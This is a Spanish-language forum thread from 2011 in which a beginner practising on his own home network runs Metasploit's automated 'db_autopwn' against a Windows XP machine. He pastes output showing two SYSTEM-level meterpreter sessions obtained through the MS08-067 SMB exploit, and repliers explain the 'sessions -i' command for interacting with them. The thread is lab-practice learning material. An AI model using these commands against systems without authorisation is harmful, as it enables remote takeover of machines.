Sesiones metasploit

Iniciado por Fastolfe, 5 Abril 2011, 16:55 PM

0 Miembros y 1 Visitante están viendo este tema.

Fastolfe

Buenas! en primer lugar no estoy muy seguro de si este es el sitio adecuado para este post, perdón si este no es su lugar!

Estoy montandome una pequeña red en casa para ver si puedo hackear mis propios ordenadores con el objetivo de poner en práctica lo poco que se.

Mi duda es la siguiente:

Tengo un ordenador con windows XP SP3 con un servidor ftp (el filezilla) y recursos compartidos y otros dos con ubuntu 10.10. Me he bajado el metasploit y después de ver los puertos abiertos del ordenador con XP he usado el siguiente comando del metasploit "db_autopwn -t -x -p -r" con los siguientes resultados:

1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ NOMBREDELORDENADOR  192.168.1.120:12001 -> 192.168.1.145:1077  exploit/windows/smb/ms08_067_netapi
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ NOMBREDELORDENADOR  192.168.1.120:10854 -> 192.168.1.145:1080  exploit/windows/smb/ms08_067_netapi

Algo más arriba me aparece este mensaje:

The autopwn command has completed with 2 sessions
  • Enter sessions -i [ID] to interact with a given session ID

    ¿Cómo uso las sesiones obtenidas? Tan solo se me ha ocurrido escribir "-i 1", pero da este error:
    [-] Unknown command: -i.

    Gracias de antemano!

wACtOr

sessions -i 1

Usar autopwn esta bien cuando ya sabes como funciona. Simplemente es una automaticacion.

Prueba a cargar los exploits y payloads a mano para ir acostumbrandote.

Fastolfe

Soy un noob así que me miraré cómo cargar los payloads y los exploits xD
Gracias!!

bernolas


oOTaMsISOo

Como dice wactor, debes de poner sessions -i <id de la session>. Por ejemplo en tu caso tienes dos, prueba con: sessions -i 1 o sessions -i 2.  :D

kiriost

Buenísimo. Gracias por el PDF de Auditoría, me sirvió de mucho  ;-)
http://www.godsys.com.ar > Programación. Hacking y Cracking. Sistemas. Desarrollo Web.
Java, C/C++, PHP, Python, Perl, HTML, Game-Hacking, Defacing, Desarrollo Web, GNU/Linux, y más